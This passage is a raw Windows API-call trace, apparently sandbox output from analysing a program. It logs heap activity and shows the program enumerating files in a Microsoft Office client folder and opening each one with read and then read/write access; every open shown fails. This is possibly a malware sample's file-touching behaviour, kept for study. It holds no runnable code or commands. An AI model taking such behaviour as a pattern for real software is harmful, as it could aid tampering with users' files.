(hFile=0x368) returned 0x1 [0099.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0099.968] CloseHandle (hObject=0x368) returned 1 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0099.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0099.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0099.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0099.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0099.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.970] AreFileApisANSI () returned 1 [0099.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0099.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ac50 [0099.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8ac50, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate64.exe") returned 69 [0099.970] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppVDllSurrogate64.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvdllsurrogate64.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd153dc41, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd153dc41, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd1e2e85a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3e4d8)) returned 1 [0099.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0099.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0099.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.970] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x420, ftCreationTime.dwLowDateTime=0x86813dc4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86813dc4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x86813dc4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x77892bc0, cFileName="AppvIsvStream32.dll", cAlternateFileName="APPVIS~1.DLL")) returned 1 [0099.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0099.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0099.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0099.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0099.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0099.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0099.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0099.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0099.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0099.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0099.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0099.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0099.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0099.971] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.971] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.971] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.971] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0099.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.971] AreFileApisANSI () returned 1 [0099.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll", lpUsedDefaultChar=0x0) returned 66 [0099.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0099.971] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.971] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.971] AreFileApisANSI () returned 1 [0099.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0099.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82ef8 [0099.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x82ef8, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll") returned 66 [0099.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvstream32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.972] GetLastError () returned 0x2 [0099.972] GetLastError () returned 0x2 [0099.972] SetLastError (dwErrCode=0x2) [0099.972] GetLastError () returned 0x2 [0099.972] SetLastError (dwErrCode=0x2) [0099.972] GetLastError () returned 0x2 [0099.972] SetLastError (dwErrCode=0x2) [0099.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82ef8 | out: hHeap=0x20000) returned 1 [0099.972] AreFileApisANSI () returned 1 [0099.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0099.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82c28 [0099.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x82c28, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll") returned 66 [0099.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvstream32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.972] GetLastError () returned 0x2 [0099.972] GetLastError () returned 0x2 [0099.972] SetLastError (dwErrCode=0x2) [0099.972] GetLastError () returned 0x2 [0099.972] SetLastError (dwErrCode=0x2) [0099.972] GetLastError () returned 0x2 [0099.972] SetLastError (dwErrCode=0x2) [0099.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82c28 | out: hHeap=0x20000) returned 1 [0099.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0099.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.973] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x420, ftCreationTime.dwLowDateTime=0x86813dc4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86813dc4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x86813dc4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x77892bc0, cFileName="AppvIsvStream64.dll", cAlternateFileName="APPVIS~2.DLL")) returned 1 [0099.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0099.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0099.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0099.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0099.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0099.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0099.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0099.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0099.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0099.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0099.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0099.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0099.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0099.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0099.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0099.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0099.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0099.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0099.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0099.974] AreFileApisANSI () returned 1 [0099.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll", lpUsedDefaultChar=0x0) returned 66 [0099.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0099.974] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.974] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.974] AreFileApisANSI () returned 1 [0099.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0099.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82448 [0099.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x82448, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll") returned 66 [0099.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvstream64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.985] GetLastError () returned 0x2 [0099.985] GetLastError () returned 0x2 [0099.985] SetLastError (dwErrCode=0x2) [0099.985] GetLastError () returned 0x2 [0099.985] SetLastError (dwErrCode=0x2) [0099.985] GetLastError () returned 0x2 [0099.985] SetLastError (dwErrCode=0x2) [0099.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82448 | out: hHeap=0x20000) returned 1 [0099.985] AreFileApisANSI () returned 1 [0099.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0099.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x829e8 [0099.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x829e8, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll") returned 66 [0099.985] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvstream64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.985] GetLastError () returned 0x2 [0099.985] GetLastError () returned 0x2 [0099.985] SetLastError (dwErrCode=0x2) [0099.986] GetLastError () returned 0x2 [0099.986] SetLastError (dwErrCode=0x2) [0099.986] GetLastError () returned 0x2 [0099.986] SetLastError (dwErrCode=0x2) [0099.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x829e8 | out: hHeap=0x20000) returned 1 [0099.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0099.986] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.986] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.986] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x420, ftCreationTime.dwLowDateTime=0x86813dc4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86813dc4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x86813dc4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x77892bc0, cFileName="AppvIsvSubsystems32.dll", cAlternateFileName="APPVIS~3.DLL")) returned 1 [0099.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0099.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0099.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0099.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0099.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0099.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0099.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0099.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0099.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0099.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0099.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0099.987] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 